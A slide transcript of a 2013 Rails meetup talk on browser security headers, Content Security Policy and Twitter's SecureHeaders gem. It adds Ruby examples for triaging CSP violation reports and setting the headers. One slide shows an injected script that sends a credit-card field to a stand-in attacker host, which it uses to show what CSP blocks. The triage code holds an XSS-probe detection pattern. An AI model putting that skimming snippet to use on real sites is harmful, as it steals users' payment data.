2013: OC Rails Jan - SecureHeaders library and content security policy
Uploaded by neil-matatall
Transcript of 2013: OC Rails Jan - SecureHeaders library and content security policy
@ocrails | @ndm
@ocrails, January 30, 2013
Not your typical Rails security talk
Header use @ Twitter
What are headers?
Wait, not those ones
OK, but what are browser headers?
Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
Accept: text/plain
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Response headers
Cache-Control: max-age=3600
ETag: "737060cd8c284d8af7ad3082f209582d"
Location: http://www.w3.org/pub/WWW/People.html
I’m already bored
Time to get awesomer
Security headers
Leverage the browser for security
Sweeeeet. I don’t have to write secure code!
Time of convergence
Should you?
Do you use these?
Content security policy
X-Frame-Options
HTTP Strict Transport Security
X-Xss-Protection
X-Content-Type-Options
X-Content-Type-Options
Fixes MIME sniffing attacks
Only applies to IE, because only IE would do something like this
X-Content-Type-Options: nosniff
zzzzZZZZZZzzzzz
X-Xss-Protection
Use the browser’s built in XSS Auditor
X-Xss-Protection: [0-1](; mode=block)?
X-Xss-Protection: 1; mode=block
(SCREENSHOT OF BLOCKED SCRIPT)
zzzzZZZ... huh? zzzzzzzz
X-Frame-Options
Protects you from most classes of Clickjacking
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
X-Frame-Options: ALLOW-FROM https://example.com
zzz... oh hey that’s cool. Don’t frame my stuff.
@owaspoc Jan 2013 | @ndm | @presidentbeef
X-Frame-Options
Firesheep / SSL Strip
Given I haven’t received an HSTS header
And I have a session
When I visit http://example.com
Then I am pwned
Other SSL fails
Posting passwords over HTTP
Loading mixed content
Using protocol relative URLs
Strict Transport Security
How hard is it to use?
Base case: Strict-Transport-Security: max-age=10000000
Do all of your subdomains support SSL? Strict-Transport-Security: max-age=10000000; includeSubdomains
(SSL FOR DUMMIES PICTURE)
Content secur-a-wat?
Content security policy is reshaping the security model
It is a complicated spec with great differences across browsers
It is not widely adopted
However, it completely eliminates reflected and stored XSS
It ensures that you never load mixed content
It can protect users with infected browsers
It allows you to accept arbitrary HTML code from users
Wat? Sounds cool.
x-webkit-csp:
script-src
style-src
img-src
default-src
frame-src
connect-src
font-src
media-src
object-src
report-uri
Get rid of XSS, eh?
A script-src directive that doesn’t contain ‘unsafe-inline’ almost eliminates most forms of cross site scripting.
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
But I have to...
OK, then I’ll inject:
<script>
var image = new Image();
image.src = "cyberhacker.com/steal?data=" + $('#credit_card').val();
</script>
FALSE! img-src violation, no XHR allowed
Inline css too? WTF?
Choose your own adventure
Apply all the headers!
How to apply?
Secure headers!
Open sourced earlier this month
https://github.com/twitter/secureheaders
How does it work?
It sets a before_filter that applies each header
Values are based on options passed to the filter, or set in an initializer
Easily overridden
Secure by default!!!
What about that security policy thingy
There are > 6 differences between these two header values
Yay for standards
Long hair don’t care
About browser inconsistencies
Other features
Set separate policies for http/https
Autofill chrome-extension: (becoming part of the spec)
Auto fill missing directives with the default value (becoming part of the spec)
You mean there’s more on CSP?
The browser sends reports!
What does the report look like?
{
  "csp-report" => {
    "document-uri" => "http://localhost:3000/home",
    "referrer" => "",
    "blocked-uri" => "ws://localhost:35729/livereload",
    "violated-directive" => "xhr-src ws://localhost.twitter.com:*"
  }
}
Quiz: what does this report indicate?
{
  "csp-report" => {
    "document-uri" => "http://example.com/welcome",
    "referrer" => "",
    "blocked-uri" => "self",
    "violated-directive" => "inline script base restriction",
    "source-file" => "http://example.com/welcome",
    "script-sample" => "alert(1)",
    "line-number" => 81
  }
}
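The two reports above, as an added Ruby example (not from the talk or the SecureHeaders gem): a small triage routine for the JSON a browser POSTs to report-uri, so that "monitor and tune" can separate dev noise, sources the policy forgot, and blocked inline scripts. The report bodies are constructed from the slides; the classification rules and the probe-payload pattern are assumptions.

```ruby
require 'json'
require 'uri'

# Constructed from the two reports on the slides (a browser POSTs these as JSON
# to the report-uri whenever the policy blocks something).
REPORTS = [
  '{"csp-report":{"document-uri":"http://localhost:3000/home","referrer":"",' \
  '"blocked-uri":"ws://localhost:35729/livereload",' \
  '"violated-directive":"xhr-src ws://localhost.twitter.com:*"}}',
  '{"csp-report":{"document-uri":"http://example.com/welcome","referrer":"",' \
  '"blocked-uri":"self","violated-directive":"inline script base restriction",' \
  '"source-file":"http://example.com/welcome","script-sample":"alert(1)",' \
  '"line-number":81}}'
].freeze

# Classify one report; returns [kind, one-line detail] for logging or alerting.
def triage_csp_report(json)
  r         = JSON.parse(json).fetch('csp-report')
  directive = r.fetch('violated-directive', '')
  blocked   = r.fetch('blocked-uri', '')
  doc       = r.fetch('document-uri', '')
  host      = (URI.parse(doc).host rescue nil)

  if directive.include?('inline script')
    # An inline script was blocked: either the app still ships inline JS (fix the
    # view) or someone injected a script that the policy stopped. A textbook probe
    # payload deserves an alert rather than a trend line (assumed pattern).
    sample = r['script-sample'].to_s
    kind   = sample.match?(/\A(alert|prompt|confirm)\(|document\.cookie/) ? :possible_xss_probe : :inline_script
    return [kind, "#{doc}:#{r['line-number']} sample=#{sample.inspect}"]
  end

  # Local dev tooling (livereload's websocket on the first slide) is noise, not a bug.
  return [:dev_noise, "#{blocked} blocked by #{directive}"] if %w[localhost 127.0.0.1].include?(host)

  # Anything else is a source the policy forgot to allow (or one it should keep blocking).
  [:missing_source, "add #{blocked} to #{directive.split.first}"]
end

# Count kinds over a batch of reports: the input for "trending and anomalies".
def tally_reports(reports)
  reports.each_with_object(Hash.new(0)) { |j, acc| acc[triage_csp_report(j).first] += 1 }
end
```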
Header gem to the rescue
It forwards CSP reports for Firefox
It makes setting an enforce and a report-only mode easy for experimentation
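The before_filter-with-options design from "How does it work?", the separate http/https policies from "Other features", and the enforce vs. report-only switch above, as an added Ruby example (not the SecureHeaders gem's own code): a minimal Rack middleware that applies the talk's headers with secure defaults and app-level overrides. The option names, the sample policies, the /csp_report path, and the use of the standard Content-Security-Policy header name instead of the 2013 browser-prefixed ones are assumptions.

```ruby
# Added example, not the SecureHeaders gem's own code: a minimal Rack middleware
# that applies the talk's headers with secure defaults, lets an app override any
# value, keeps separate CSP policies for http and https, and can run CSP in
# report-only mode while tuning. Option names and policies are assumed.
class SecureHeadersMiddleware
  DEFAULTS = {
    x_frame_options:         'SAMEORIGIN',
    x_xss_protection:        '1; mode=block',
    x_content_type_options:  'nosniff',
    hsts_max_age:            10_000_000,   # the value used on the HSTS slide
    hsts_include_subdomains: false,        # only true if every subdomain serves SSL
    csp_report_only:         false,        # true while tuning, false to enforce
    csp_report_uri:          '/csp_report',
    # No 'unsafe-inline' in script-src: inline scripts, injected or not, are blocked.
    csp_https: "default-src https: 'self'; script-src https: 'self'; report-uri %{report}",
    csp_http:  "default-src 'self'; script-src 'self'; report-uri %{report}"
  }.freeze

  def initialize(app, opts = {})
    @app  = app
    @opts = DEFAULTS.merge(opts)   # app-level overrides win over the defaults
  end

  # Rack entry point: run the app, then add the security headers to its response.
  def call(env)
    status, headers, body = @app.call(env)
    [status, headers.merge(self.class.headers_for(env['rack.url_scheme'], @opts)), body]
  end

  # Build the header hash for one request scheme ('http' or 'https').
  def self.headers_for(scheme, opts = DEFAULTS)
    https = scheme == 'https'
    csp   = (https ? opts[:csp_https] : opts[:csp_http]) % { report: opts[:csp_report_uri] }
    name  = opts[:csp_report_only] ? 'Content-Security-Policy-Report-Only' : 'Content-Security-Policy'
    h = {
      'X-Frame-Options'        => opts[:x_frame_options],
      'X-XSS-Protection'       => opts[:x_xss_protection],
      'X-Content-Type-Options' => opts[:x_content_type_options],
      name                     => csp
    }
    if https
      # Browsers ignore HSTS received over plain http, so only send it on SSL.
      hsts = "max-age=#{opts[:hsts_max_age]}"
      hsts += '; includeSubDomains' if opts[:hsts_include_subdomains]
      h['Strict-Transport-Security'] = hsts
    end
    h
  end
end
```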
Monitor and Tune ALL the things
Splunk
Trending and anomalies
CSP
Brakeman
ThreatDeck
Phantom Gang
Roshambo
Email developers
Email security
Who wants to buy me a beer?